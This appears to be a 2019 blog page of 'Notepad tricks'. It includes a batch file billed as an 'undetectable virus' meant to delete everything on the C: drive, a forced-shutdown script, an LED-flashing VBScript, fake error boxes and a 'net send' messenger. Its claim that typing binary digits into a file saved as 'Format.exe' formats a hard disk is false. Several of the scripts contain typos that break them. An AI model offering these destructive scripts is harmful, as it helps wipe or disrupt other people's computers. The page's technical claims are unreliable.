Wednesday, January 30, 2019

Write Simple Undetectable Virus

Write Simple Undetectable Virus



Open Notepad and type:
@echo off
Del C: *.*ly

And save that file as bomb.bat in your Computer.

Note:
Do not run this file in your computer
because this file delete your entire system C:Drive.

Format your Whole Hard Disk From type Code in Notepad

Format your Whole Hard Disk From type Code in Notepad





Open Notepad,
and type the below the code in your Computer:

0110011001101111011100100
1101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000

Save the file as "Format.exe"

and, Open the file.
Your Hard Disk will be formatted !

computer tricks: Make your Keyboard LED Dance

computer tricks: Make your Keyboard LED Dance:



 steps: Open the Notepad, Type: Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.senkey...

Make your Keyboard LED Dance


steps:

Open the Notepad,

Type:

Set wshShell
=wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.senkeys"{CAPSLOCK}"
wshshell.sendkeys"{NUMLOCK}"
wshshell.sendkeys"{SCROLLLOCK}"
loop

Save the file as Dance.vbs

Click the file and your all three LED lights will start dancing.
 so you want to stop the LED lights
to, shutdown your PC.

computer tricks: Force Shutdown Your Windows

computer tricks: Force Shutdown Your Windows: so guy's steps: Open Notepad and then type, @echo off shutdown computer shutdown -c "sleep Tight" -s  Save the file ...

computer tricks: computer tricks: Create Fake Windows Errors With N...

computer tricks: computer tricks: Create Fake Windows Errors With N...: computer tricks: Create Fake Windows Errors With Notepad : You can create Fake error message with any message steps: Open Notepad Type:...

Force Shutdown Your Windows

so guy's
steps:
Open Notepad
and then type,

@echo off
shutdown computer
shutdown -c "sleep Tight" -s

 Save the file with (name.Bat )
 then,
Click on your file and it will automatically shutdown your Windows.

computer tricks: Create Fake Windows Errors With Notepad

computer tricks: Create Fake Windows Errors With Notepad: You can create Fake error message with any message steps: Open Notepad Type: X=Msgbox("Message Here",0+16,"Title Here&q...

Create Fake Windows Errors With Notepad

You can create Fake error message with any message

steps:

Open Notepad
Type: X=Msgbox("Message Here",0+16,"Title Here")
Replace Message Here and Title Here with your
Error Message and Error-window Title respectively.

Save the file with error.vbs.
Now, click the file and you'll get your custom-made Windows Error Message.

Create Diary on Notepad

This Notepad trick will allow to you create a Notepad note in such a format that whenever you edit your note,
It will get saved with date and timestamp automatically to do this,
Follow the steps:

Open Notepad,
Type: LOG in first line.
Save the file as Log. txt

 Now, write something to the file and it will automatically get saves with edited date and time.

Monday, January 28, 2019

Use command prompt talk with other computer network

All you need is your friends IP address and Command prompt

Firstly,open Notepad And Enter:

and then type

@echo off
:A
Cls
echo MESSENGER
Set /p n=User:
Set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this file name is "Messenger.bat"
And then open the file And Now type the message for your friend
 Before you press Enter it should look like this:

MESSENGER
User:56.108.107
Message:Hi

Now you will chat with your friend

8 basic computer tricks to make life easier

  At this point, most of the general public should know how to use a computer in the most basic of situations.  Turn it on.  Open up the int...